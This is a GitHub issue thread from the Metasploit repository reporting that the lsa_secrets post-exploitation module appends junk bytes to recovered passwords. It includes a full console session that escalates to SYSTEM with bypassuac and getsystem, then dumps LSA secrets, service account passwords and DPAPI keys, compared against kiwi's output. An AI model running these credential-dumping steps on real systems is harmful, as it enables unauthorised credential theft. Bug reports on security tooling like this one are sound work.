post/windows/gather/lsa_secrets appends junk data to passwords

bcoles commented 6 years ago

A report on Twitter indicates that lsadump on Metasploit is broken.

Initial tests revealed a bug. No idea if it's the same issue @craigsblackie ?

Junk bytes are appended to recovered passwords. Observe the output below. The passwords are password and redacted, where as the module returns password |\~ and redactedC[+ QE

Test system in Windoes 7 SP1 x64; with session upgraded via exploit/windows/local/bypassuac and getsystem. Metasploit is latest version from git, running on Ruby 2.3.0.

msf5 exploit(windows/local/bypassuac) > use post/windows/gather/lsa_secrets 
msf5 post(windows/gather/lsa_secrets) > set session 2
session => 2
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[-] Could not retrieve LSA key. Are you SYSTEM?
[*] Post module execution completed
msf5 post(windows/gather/lsa_secrets) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 2? [y/N]  
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[+] Key: DefaultPassword
 Decrypted Value: password |\~

[+] Key: DPAPI_SYSTEM
 Decrypted Value: ,?<lJ.f$*qghGuf2H

[+] Key: _SC_MSSQL$SQLEXPRESS
 Username: NT Service\MSSQL$SQLEXPRESS 
 Decrypted Value: M"Y=aD

[+] Key: _SC_MSSQLSERVER
 Username: NT Service\MSSQLSERVER 
 Decrypted Value: _;N5kN.

[+] Key: _SC_redacted
 Username: .\redacted 
 Decrypted Value:  redactedC[+ QE

[*] Writing to loot...
[*] Data saved in: /root/.msf4/loot/20180728232749_default_172.16.191.153_registry.lsa.sec_660233.txt
[*] Post module execution completed

Compared to kiwi lsa_dump_secrets which returns the correct value.

meterpreter > lsa_dump_secrets 
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN-SGBSD5TQUTQ
SysKey : 9f288f41951f8dedc8c2011fcef7627f

Local name : WIN-SGBSD5TQUTQ ( S-1-5-21-3721788700-3134539918-2111365127 )
Domain name : WORKGROUP

Policy subsystem is : 1.11
LSA Key(s) : 1, default {b76bab56-d62d-7863-136e-0a0c1ca4bb73}
  [00] {b76bab56-d62d-7863-136e-0a0c1ca4bb73} 6afee2d5c13d317fe515c521f7c165180feba991f27dd8212d6ce93c68383da0

Secret  : DefaultPassword
cur/text: password
old/text: ROOT#123

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 1d 01 9d 3f 3c 80 6c dc 4a 2e d6 66 24 a0 04 af c2 07 2a d8 71 67 13 99 68 ed 47 75 66 32 b9 12 7f 48 c4 f9 a0 be 04 02 
    full: 1d019d3f3c806cdc4a2ed66624a004afc2072ad87167139968ed47756632b9127f48c4f9a0be0402
    m/u : 1d019d3f3c806cdc4a2ed66624a004afc2072ad8 / 7167139968ed47756632b9127f48c4f9a0be0402
old/hex : 01 00 00 00 c9 22 d6 0b 83 9e dd 98 a7 ad 7a 5a c5 ff 4e bb 8a d2 6f 01 61 be bf d4 bc 70 54 70 fd df 46 12 a8 c5 e5 2d 98 6c 79 71 
    full: c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f0161bebfd4bc705470fddf4612a8c5e52d986c7971
    m/u : c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f01 / 61bebfd4bc705470fddf4612a8c5e52d986c7971

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : NT Service\MSSQL$SQLEXPRESS

Secret  : _SC_MSSQLSERVER / service 'MSSQLSERVER' with username : NT Service\MSSQLSERVER

Secret  : _SC_redacted / service 'redacted' with username : .\redacted
cur/text: redacted

craigsblackie commented 6 years ago

Yes, this is the same issue I experienced. Should have submitted this myself, thanks for stepping in!

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

bcoles commented 3 years ago

Removing the stale label. ~~I'm not sure if this is still an issue.~~ Still an issue in 2022. Someone who isn't me should probably take a look at this.

rapid7 / metasploit-framework

post/windows/gather/lsa_secrets appends junk data to passwords #10390